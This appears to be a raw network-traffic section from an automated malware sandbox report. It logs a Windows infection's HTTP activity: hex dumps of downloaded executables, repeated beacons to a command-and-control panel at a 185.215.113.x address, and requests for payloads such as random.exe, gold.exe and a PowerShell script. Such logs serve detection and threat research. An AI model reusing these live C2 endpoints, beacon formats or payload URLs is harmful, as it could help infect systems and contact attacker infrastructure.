                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Sep 2024 13:37:22 GMTContent-Type: application/octet-streamContent-Length: 10796768Last-Modified: Fri, 20 Sep 2024 14:29:18 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ed86be-a4bee0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5d 95 67 ab 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 4e 00 00 f0 54 00 00 00 00 00 7e 10 4f 00 00 20 00 00 00 20 4f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 a4 00 00 04 00 00 65 29 a5 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 30 10 4f 00 4b 00 00 00 00 40 4f 00 56 e2 54 00 00 00 00 00 00 00 00 00 00 f0 a3 00 e0 d8 00 00 00 40 a4 00 0c 00 00 00 eb 0f 4f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 f0 4e 00 00 20 00 00 00 f2 4e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 a4 08 00 00 00 20 4f 00 00 0a 00 00 00 f6 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 56 e2 54 00 00 40 4f 00 00 e4 54 00 00 00 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 a4 00 00 02 00 00 00 e4 a3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:37:34 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 23 Sep 2024 15:59:37 GMTETag: "65ec4b-622cb79d4984d"Accept-Ranges: bytesContent-Length: 6679627Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d5 30 f1 66 00 4c 5f 00 d4 26 00 00 e0 00 06 01 0b 01 02 23 00 e6 47 00 00 9e 5a 00 00 e2 66 00 b0 14 00 00 00 10 00 00 00 00 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 c6 00 00 06 00 00 87 ce 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 80 b3 00 42 00 00 00 00 90 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b3 00 d4 29 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 ad 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 91 b3 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 e4 47 00 00 10 00 00 00 e6 47 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 a8 15 00 00 00 00 48 00 00 16 00 00 00 ec 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 18 9f 00 00 00 20 48 00 00 a0 00 00 00 02 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 c8 c7 03 00 00 c0 48 00 00 c8 03 00 00 a2 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 b4 e1 66 00 00 90 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 80 b3 00 00 02 00 00 00 6a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 90 b3 00 00 0a 00 00 00 6c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 a0 b3 00 00 02 00 00 00 76 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 b0 b3 00 00 02 00 00 00 78 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 d4 29 0e 00 00 c0 b3 00 00 2a 0e 00 00 7a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 f0 c1 00 00 08 00 00 00 a4 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 00 c2 00 00 a8 01 00 00 ac 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 b0 c3 00 00 4e 00 00 00 54 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:43 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Sun, 22 Sep 2024 20:59:29 GMTConnection: keep-aliveETag: "66f08531-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: GET /frm/_vti_cnf/Blenar.exe HTTP/1.1Host: www.leopardi.nl
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 35 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000015002&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
                                    Source: global trafficHTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
                                    Source: global trafficHTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 31 38 30 34 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000018042&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 39 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000019101&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000020001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 45 34 31 43 46 46 43 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBAE41CFFCFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                                    Source: global trafficHTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
